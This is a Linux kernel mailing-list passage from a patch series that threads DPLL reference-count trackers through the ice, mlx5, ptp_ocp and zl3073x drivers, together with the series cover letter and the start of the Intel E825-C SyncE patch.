
@@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop); + &pins[i].prop, NULL); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin); + dpll_pin_put(rclk->pin, NULL); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); } /** @@ -3271,7 +3271,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3287,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 3ea8a1766ae28..541d83e5d7183 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ 
b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -438,7 +438,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -451,7 +451,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), - THIS_MODULE, &mlx5_dpll_pin_properties); + THIS_MODULE, &mlx5_dpll_pin_properties, + NULL); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -479,11 +480,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); err_free_mdpll: kfree(mdpll); return err; @@ -499,9 +500,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index 65fe05cac8c42..f39b3966b3e8c 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -4788,7 +4788,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) 
devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4800,7 +4800,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) goto out; for (i = 0; i < OCP_SMA_NUM; i++) { - bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, &bp->sma[i].dpll_prop); + bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, + &bp->sma[i].dpll_prop, NULL); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4809,7 +4810,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); goto out_dpll; } } @@ -4819,9 +4820,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); out: ptp_ocp_detach(bp); out_disable: @@ -4842,11 +4843,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8fff048131f1d..5c80cdab0c180 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -18,6 +18,7 @@ struct dpll_device; 
struct dpll_pin; struct dpll_pin_esync; struct fwnode_handle; +struct ref_tracker; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -173,6 +174,12 @@ struct dpll_pin_properties { u32 phase_gran; }; +#ifdef CONFIG_DPLL_REFCNT_TRACKER +typedef struct ref_tracker *dpll_tracker; +#else +typedef struct {} dpll_tracker; +#endif + #define DPLL_DEVICE_CREATED 1 #define DPLL_DEVICE_DELETED 2 #define DPLL_DEVICE_CHANGED 3 @@ -205,7 +212,8 @@ size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -223,16 +231,17 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) } static inline struct dpll_pin * -fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +fwnode_dpll_pin_find(struct fwnode_handle *fwnode, dpll_tracker *tracker) { return NULL; } #endif struct dpll_device * -dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module); +dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module, + dpll_tracker *tracker); -void dpll_device_put(struct dpll_device *dpll); +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker); int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, const struct dpll_device_ops *ops, void *priv); @@ -244,7 +253,7 @@ void dpll_device_unregister(struct dpll_device *dpll, struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, - const struct dpll_pin_properties *prop); + const struct dpll_pin_properties *prop, dpll_tracker *tracker); int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); 
@@ -252,7 +261,7 @@ int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker); void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:36 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. 
Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Update existing DPLL drivers to utilize the DPLL reference count tracking infrastructure. Add dpll_tracker fields to the drivers' internal device and pin structures. Pass pointers to these trackers when calling dpll_device_get/put() and dpll_pin_get/put(). This allows developers to inspect the specific references held by this driver via debugfs when CONFIG_DPLL_REFCNT_TRACKER is enabled, aiding in the debugging of resource leaks. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 14 ++++++++------ drivers/dpll/zl3073x/dpll.h | 2 ++ drivers/net/ethernet/intel/ice/ice_dpll.c | 15 ++++++++------- drivers/net/ethernet/intel/ice/ice_dpll.h | 4 ++++ drivers/net/ethernet/mellanox/mlx5/core/dpll.c | 15 +++++++++------ drivers/ptp/ptp_ocp.c | 17 ++++++++++------- 6 files changed, 41 insertions(+), 26 deletions(-) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 8788bcab7ec53..a99d143a7acde 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -29,6 +29,7 @@ * @list: this DPLL pin list entry * @dpll: DPLL the pin is registered to * @dpll_pin: pointer to registered dpll_pin + * @tracker: tracking object for the acquired reference * @label: package label * @dir: pin direction * @id: pin id @@ -44,6 +45,7 @@ struct zl3073x_dpll_pin { struct list_head list; struct zl3073x_dpll *dpll; struct dpll_pin *dpll_pin; + dpll_tracker tracker; char label[8]; enum dpll_pin_direction dir; u8 id; @@ -1480,7 +1482,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props, NULL); + &props->dpll_props, &pin->tracker); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1505,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - 
dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1536,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); pin->dpll_pin = NULL; } @@ -1708,7 +1710,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE, NULL); + THIS_MODULE, &zldpll->tracker); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1722,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } @@ -1743,7 +1745,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } diff --git a/drivers/dpll/zl3073x/dpll.h b/drivers/dpll/zl3073x/dpll.h index e8c39b44b356c..c65c798c37927 100644 --- a/drivers/dpll/zl3073x/dpll.h +++ b/drivers/dpll/zl3073x/dpll.h @@ -18,6 +18,7 @@ * @check_count: periodic check counter * @phase_monitor: is phase offset monitor enabled * @dpll_dev: pointer to registered DPLL device + * @tracker: tracking object for the acquired reference * @lock_status: last saved DPLL lock status * @pins: list of pins * @change_work: device change notification work @@ -31,6 +32,7 @@ struct zl3073x_dpll { u8 check_count; bool phase_monitor; struct dpll_device *dpll_dev; + dpll_tracker tracker; enum dpll_lock_status lock_status; struct list_head pins; struct 
work_struct change_work; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 64b7b045ecd58..4eca62688d834 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop, NULL); + &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin, NULL); + dpll_pin_put(rclk->pin, &rclk->tracker); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); } /** @@ -3271,7 +3271,8 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, + &d->tracker); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3288,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, 
type, ops, d); if (ret) { - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index c0da03384ce91..63fac6510df6e 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -23,6 +23,7 @@ enum ice_dpll_pin_sw { /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin + * @tracker: reference count tracker * @idx: ice pin private idx * @num_parents: hols number of parent pins * @parent_idx: hold indexes of parent pins @@ -37,6 +38,7 @@ enum ice_dpll_pin_sw { struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; + dpll_tracker tracker; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -58,6 +60,7 @@ struct ice_dpll_pin { /** ice_dpll - store info required for DPLL control * @dpll: pointer to dpll dev * @pf: pointer to pf, which has registered the dpll_device + * @tracker: reference count tracker * @dpll_idx: index of dpll on the NIC * @input_idx: currently selected input index * @prev_input_idx: previously selected input index @@ -76,6 +79,7 @@ struct ice_dpll_pin { struct ice_dpll { struct dpll_device *dpll; struct ice_pf *pf; + dpll_tracker tracker; u8 dpll_idx; u8 input_idx; u8 prev_input_idx; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 541d83e5d7183..3981dd81d4c17 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -9,7 +9,9 @@ */ struct mlx5_dpll { struct dpll_device *dpll; + dpll_tracker dpll_tracker; struct dpll_pin *dpll_pin; + dpll_tracker pin_tracker; struct mlx5_core_dev *mdev; struct workqueue_struct *wq; struct delayed_work work; @@ -438,7 +440,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); 
/* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, + &mdpll->dpll_tracker); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -452,7 +455,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), THIS_MODULE, &mlx5_dpll_pin_properties, - NULL); + &mdpll->pin_tracker); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -480,11 +483,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); err_free_mdpll: kfree(mdpll); return err; @@ -500,9 +503,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index f39b3966b3e8c..1b16a9c3d7fdc 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -285,6 +285,7 @@ struct ptp_ocp_sma_connector { u8 default_fcn; struct dpll_pin *dpll_pin; struct dpll_pin_properties dpll_prop; + dpll_tracker tracker; }; struct ocp_attr_group 
{ @@ -383,6 +384,7 @@ struct ptp_ocp { struct ptp_ocp_sma_connector sma[OCP_SMA_NUM]; const struct ocp_sma_op *sma_op; struct dpll_device *dpll; + dpll_tracker tracker; int signals_nr; int freq_in_nr; }; @@ -4788,7 +4790,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, &bp->tracker); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4801,7 +4803,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) for (i = 0; i < OCP_SMA_NUM; i++) { bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, - &bp->sma[i].dpll_prop, NULL); + &bp->sma[i].dpll_prop, + &bp->sma[i].tracker); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4810,7 +4813,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); goto out_dpll; } } @@ -4820,9 +4823,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); out: ptp_ocp_detach(bp); out_disable: @@ -4843,11 +4846,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } } dpll_device_unregister(bp->dpll, &dpll_ops, 
bp); - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); -- 2.52.0
From: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> Implement SyncE support for the E825-C Ethernet controller using the DPLL subsystem. Unlike E810, the E825-C architecture relies on platform firmware (ACPI) to describe connections between the NIC's recovered clock outputs and external DPLL inputs. Implement the following mechanisms to support this architecture: 1. Discovery Mechanism: The driver parses the 'dpll-pins' and 'dpll-pin-names' firmware properties to identify the external DPLL pins (parents) corresponding to its RCLK outputs ("rclk0", "rclk1"). It uses fwnode_dpll_pin_find() to locate these parent pins in the DPLL core. 2. Asynchronous Registration: Since the platform DPLL driver (e.g. zl3073x) may probe independently of the network driver, utilize the DPLL notifier chain. The driver listens for DPLL_PIN_CREATED events to detect when the parent MUX pins become available, then registers its own Recovered Clock (RCLK) pins as children of those parents. 3. Hardware Configuration: Implement the specific register access logic for E825-C CGU (Clock Generation Unit) registers (R10, R11). This includes configuring the bypass MUXes and clock dividers required to drive SyncE signals. 4. Split Initialization: Refactor `ice_dpll_init()` to separate the static initialization path of E810 from the dynamic, firmware-driven path required for E825-C. 
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Co-developed-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> --- v3: * DPLL init check in ice_ptp_link_change() * using completion for dpll initization to avoid races with DPLL notifier scheduled works * added parsing of dpll-pin-names and dpll-pins properties v2: * fixed error path in ice_dpll_init_pins_e825() * fixed misleading comment referring 'device tree' --- drivers/net/ethernet/intel/ice/ice_dpll.c | 742 +++++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 26 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 ++++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + 8 files changed, 956 insertions(+), 92 deletions(-) diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 4eca62688d834..a8c99e49bfae6 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -5,6 +5,7 @@ #include "ice_lib.h" #include "ice_trace.h" #include <linux/dpll.h> +#include <linux/property.h> #define ICE_CGU_STATE_ACQ_ERR_THRESHOLD 50 #define ICE_DPLL_PIN_IDX_INVALID 0xff @@ -528,6 +529,92 @@ ice_dpll_pin_disable(struct ice_hw *hw, struct ice_dpll_pin *pin, return ret; } +/** + * ice_dpll_pin_store_state - updates the state of pin in SW bookkeeping + * @pin: pointer to a pin + * @parent: parent pin index + * @state: pin state (connected or disconnected) 